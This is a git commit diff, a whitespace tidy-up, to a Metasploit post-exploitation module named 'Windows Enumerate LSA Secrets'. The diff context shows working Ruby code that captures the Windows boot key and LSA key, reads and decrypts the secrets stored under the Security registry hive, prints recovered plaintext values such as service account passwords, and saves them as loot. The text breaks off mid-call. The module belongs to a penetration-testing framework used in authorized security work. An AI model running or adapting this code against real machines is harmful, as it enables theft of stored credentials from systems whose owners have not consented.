msftidy up

bug/bundler_fix
Rob Fuller 2013-10-16 22:17:05 -04:00
parent b42687151f
commit 2fbd7ea0ba
1 changed files with 8 additions and 8 deletions


@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
'Name' => "Windows Enumerate LSA Secrets", 'Name' => "Windows Enumerate LSA Secrets",
'Description' => %q{ 'Description' => %q{
This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is: This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
code from cachedump. code from cachedump.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -211,7 +211,7 @@ class Metasploit3 < Msf::Post
sk_arr = meterpreter_registry_enumkeys(mid_key) sk_arr = meterpreter_registry_enumkeys(mid_key)
sk_arr.each do |mkeys| sk_arr.each do |mkeys|
begin begin
#CurrVal stores the currently set value of the key, in the case of #CurrVal stores the currently set value of the key, in the case of
#services it usually come out as plan text #services it usually come out as plan text
if(mkeys == "CurrVal") if(mkeys == "CurrVal")
val_key = root_key + "\\" + keys + "\\" + mkeys val_key = root_key + "\\" + keys + "\\" + mkeys
@ -226,7 +226,7 @@ class Metasploit3 < Msf::Post
sec = sec[0xC..-1] sec = sec[0xC..-1]
sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
end end
if(sec.length > 0) if(sec.length > 0)
if(keys[0,4] == "_SC_") if(keys[0,4] == "_SC_")
user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\" user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
keys_c = keys[4,keys.length] keys_c = keys[4,keys.length]
@ -241,7 +241,7 @@ class Metasploit3 < Msf::Post
#if the unencrypted value is not blank, print #if the unencrypted value is not blank, print
print_good("Key: #{keys} \n Decrypted Value: #{sec}\n") print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n" sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
end end
end end
else else
next next
@ -262,24 +262,24 @@ class Metasploit3 < Msf::Post
rescue rescue
print_error("Cannot find key.") print_error("Cannot find key.")
end end
return sec_str return sec_str
end end
# The sauce starts here # The sauce starts here
def run def run
print_status('Obtaining boot key...') print_status('Obtaining boot key...')
bootkey = capture_boot_key bootkey = capture_boot_key
#print_status("Boot key: #{bootkey.unpack("H*")[0]}") #print_status("Boot key: #{bootkey.unpack("H*")[0]}")
print_status('Obtaining Lsa key...') print_status('Obtaining Lsa key...')
lsakey = capture_lsa_key(bootkey) lsakey = capture_lsa_key(bootkey)
#print_status("Lsa Key: #{lsakey.unpack("H*")[0]}") #print_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
hostname = session.sys.config.sysinfo['Computer'] hostname = session.sys.config.sysinfo['Computer']
print_status("Executing module against #{hostname}") print_status("Executing module against #{hostname}")
client.railgun.netapi32() client.railgun.netapi32()
begin begin
secrets = hostname << get_secret(lsakey) secrets = hostname << get_secret(lsakey)
print_status("Writing to loot...") print_status("Writing to loot...")
path = store_loot( path = store_loot(
'registry.lsa.sec', 'registry.lsa.sec',